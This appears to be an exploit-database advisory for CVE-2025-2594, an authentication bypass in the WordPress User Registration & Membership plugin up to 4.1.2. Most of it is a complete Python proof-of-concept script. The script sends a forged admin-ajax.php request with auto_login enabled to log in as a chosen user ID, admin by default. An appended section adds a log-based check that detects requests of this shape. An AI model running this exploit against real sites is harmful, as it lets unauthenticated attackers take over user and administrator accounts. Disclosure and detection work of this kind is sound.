Exploit Title
User Registration & Membership Plugin ≤ 4.1.2 - Authentication Bypass (CVE-2025-2594)
Date: May 22, 2025
Author: Mohammed Idrees Banyamer
Vendor Homepage: wordpress.org/plugins/user-registration
Plugin Download: Download v4.1.2 ZIP
CVE: CVE-2025-2594
Vulnerability Overview
The User Registration & Membership plugin for WordPress (≤ 4.1.2) contains an authentication bypass vulnerability. An unauthenticated attacker can exploit this flaw to bypass login protections and gain unauthorized access to user accounts, including administrative ones, under specific configurations.
Proof of Concept
```python
#!/usr/bin/env python3
# Exploit Title: WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass
# Date: 2025-05-22
# Exploit Author: Mohammed Idrees Banyamer
# Vendor Homepage: https://wordpress.org/plugins/user-registration/
# Software Link: https://downloads.wordpress.org/plugin/user-registration.4.1.2.zip
# Version: <= 4.1.2
# Tested on: WordPress 6.x, Apache on Linux
# CVE: CVE-2025-2594

import requests
import sys
import argparse
from urllib.parse import urljoin
from termcolor import cprint, colored


def banner():
    cprint("╔══════════════════════════════════════════════╗", "cyan")
    cprint("║ WordPress Plugin User Registration <= 4.1.2 ║", "cyan")
    cprint("║ Authentication Bypass Exploit (CVE-2025-2594)║", "cyan")
    cprint("║ Author: Mohammed Idrees Banyamer             ║", "cyan")
    cprint("╚══════════════════════════════════════════════╝", "cyan")


def exploit(target_url, member_id, nonce):
    endpoint = urljoin(target_url, "/wp-admin/admin-ajax.php")

    files = {
        'action': (None, 'user_registration_membership_confirm_payment'),
        'security': (None, nonce),
        'form_response': (None, '{"auto_login": true}'),
        'member_id': (None, str(member_id))
    }

    cprint(f"[+] Target URL: {endpoint}", "yellow")
    cprint(f"[+] Attempting to bypass authentication as user ID {member_id}...\n", "yellow")

    try:
        response = requests.post(endpoint, files=files, timeout=10)

        if response.status_code == 200 and '"success":true' in response.text:
            cprint("[✓] Exploit successful! Authentication bypass achieved.", "green")
            cprint("[!] Check your session/cookies - you may now be authenticated as the target user.\n", "green")
            print("Server Response:")
            print(response.text)
        else:
            cprint("[-] Exploit failed or invalid nonce/member_id.", "red")
            print("Server Response:")
            print(response.text)

    except requests.exceptions.RequestException as e:
        cprint(f"[!] Request failed: {e}", "red")


def main():
    banner()
    parser = argparse.ArgumentParser(description="CVE-2025-2594 - WordPress Plugin Authentication Bypass")
    parser.add_argument("target", help="Base target URL (e.g., http://localhost)")
    parser.add_argument("member_id", help="Target user ID (usually 1 for admin)")
    parser.add_argument("nonce", help="_confirm_payment_nonce value from registration page")

    args = parser.parse_args()
    exploit(args.target, args.member_id, args.nonce)


if __name__ == "__main__":
    main()
```
Tested On
WordPress 6.x running on Apache (Linux)
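
A defender-side check built from the request shape in the proof of concept above, as an added example that is not part of the original advisory: it decodes a logged POST body (multipart, as the PoC sends it, or urlencoded, which PHP maps to the same fields) and flags requests to admin-ajax.php that carry this action with auto_login set. The function names, the sample requests and the availability of request bodies from a WAF or reverse-proxy log are assumptions of this example.

```python
import email
import json
from urllib.parse import parse_qs, urlsplit

# AJAX action named in the PoC above.
ACTION = "user_registration_membership_confirm_payment"

def form_fields(content_type: str, body: bytes) -> dict:
    """Decode a POST body (multipart or urlencoded) into {field: value}."""
    if content_type.lower().startswith("multipart/form-data"):
        # Reuse the stdlib MIME parser: prepend the request's Content-Type header.
        raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
        msg = email.message_from_bytes(raw)
        fields = {}
        for part in (msg.get_payload() if msg.is_multipart() else []):
            name = part.get_param("name", header="content-disposition")
            if name:
                value = part.get_payload(decode=True) or b""
                fields[name] = value.decode("utf-8", "replace").strip()
        return fields
    return {k: v[-1] for k, v in parse_qs(body.decode("utf-8", "replace")).items()}

def matches_poc_shape(method: str, url: str, content_type: str, body: bytes) -> bool:
    """True when a logged request has the shape the PoC sends."""
    if method.upper() != "POST":
        return False
    if not urlsplit(url).path.endswith("/wp-admin/admin-ajax.php"):
        return False
    fields = form_fields(content_type, body)
    if fields.get("action") != ACTION or "member_id" not in fields:
        return False
    try:
        form_response = json.loads(fields.get("form_response", ""))
    except ValueError:  # missing or malformed JSON
        return False
    return isinstance(form_response, dict) and bool(form_response.get("auto_login"))

# Constructed sample requests (not captured traffic); the nonce is a placeholder.
CT_MULTIPART = "multipart/form-data; boundary=XX"
def _part(name, value):
    return f'--XX\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'
BODY_MULTIPART = ("".join(_part(n, v) for n, v in [
    ("action", ACTION), ("security", "NONCE_PLACEHOLDER"),
    ("form_response", '{"auto_login": true}'), ("member_id", "1"),
]) + "--XX--\r\n").encode()
BODY_URLENCODED = (b"action=" + ACTION.encode() +
                   b"&form_response=%7B%22auto_login%22%3Atrue%7D&member_id=1")
BODY_BENIGN = b"action=heartbeat&_nonce=NONCE_PLACEHOLDER"
```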